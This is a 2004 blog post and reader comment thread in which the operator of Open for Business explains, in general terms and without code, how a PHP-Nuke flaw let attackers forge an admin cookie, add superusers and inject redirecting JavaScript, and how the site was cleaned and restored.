Open for Business Back Online, Hack Explained
On April 1, 2004, a single, carefully crafted URL was sent to OfB.biz, returning a set of encrypted strings. The same request was reissued in the midst of thousands of normal requests on April 2 and 7. The requests came from Tehran, Cairo and Sarajevo. Then there was a week of silence. Late on April 13, however, another string of requests came, this time from various ISP's in Tel Aviv.
The strings taken from the previous week were encrypted together to form the administrative access cookie for PHP-Nuke. After forming the cookie, the new requests were used to insert multiple superuser users providing complete access to all of PHP-Nuke's functionality. The accounts were systematically added from different IP addresses over a period of several hours going well into April 14. After creating these superuser accounts and moving the original superuser account to a semi-removable status, the perpetrator then entered the block administrator and placed obfuscated JavaScript code hidden near the JavaScript code for the advertising banners.
The JavaScript code reported back information concerning visitor hits using a unique ID and then forwarded users to a pornographic web site before they knew anything had happened. The attack was complete. The attacker then moved onto other sites, defacing PCLinuxOnline on the same day and Linux and Main on April 15.
Three days later, I have hand checked the nearly 300 articles on Open for Business, cleaned out the JavaScript and successfully brought OfB back online with a number of security patches. However, with this being the second time that the poor design of PHP-Nuke has allowed the site to be attacked, my days using PHP-Nuke are numbered. Assuming that SAFARI eventually is finished (I've been talking about that for how many years now?), I will be moving over to that and escaping this security mess forever.
Join the Conversation
RE: Open for Business Back Online, Hack Explained
Thanks for explaining, notwithstanding my complete ignorance of PHP. So it was all about money via porn? Still sinister, though not as I expected. Such crooks are in the same class as spammers: they never really believe how deeply the majority despise what they offer. But if just one or two in a thousand takes the bait, it’s worth it to them.
Now what?
RE: Open for Business Back Online, Hack Explained
Nods head and pretends that he understands. So were you locked out of the program? Did you have to start from stratch and a backup? Are these people targeting a certian type of site or a certain topic? (I noticed Linux mentioned alot.) Can I be a superuser? (That sounds like fun.)
RE: Open for Business Back Online, Hack Explained
Christopher: No, I’m not sure if they aimed to, but they never got around to locking me out… so I just went through and cleaned up the existing database. I’m not sure if they are targetting certain sites or not — most of the PHP-Nuke sites I frequent are GNU/Linux sites, so that might be it. Or, it could be someone familar with GNU/Linux sites and aiming to take them down.
At any rate, superuser isn’t as much fun as it sounds.
It just means you can post articles at OfB and add/delete users, etc. Of course, if you ever want to start writing about GNU/Linux…
Oh, interestingly enough, there was one more attack I caught that occurred apparently while the public face of the site was down, but before I applied security fixes. I eliminated that hacker and now I think all is good to go. Some more attacks came in today but failed.
RE: Open for Business Back Online, Hack Explained
So was it automated? I’m gonna have to guess that somehow it was, because that was an awful lot of useless work to forget to lock the real admin out. Seems rather silly of them unless it was all just for kicks.
RE: Open for Business Back Online, Hack Explained
I’m not sure. I tend to think it was semi-automated (i.e. they aimed at certain sites but had a preprogrammed routine to do it…).